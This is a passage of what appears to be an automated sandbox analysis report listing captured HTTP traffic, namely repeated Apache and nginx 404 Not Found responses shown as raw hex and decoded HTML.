74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:52 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 09:21:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 09:22:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 09:22:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 09:22:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 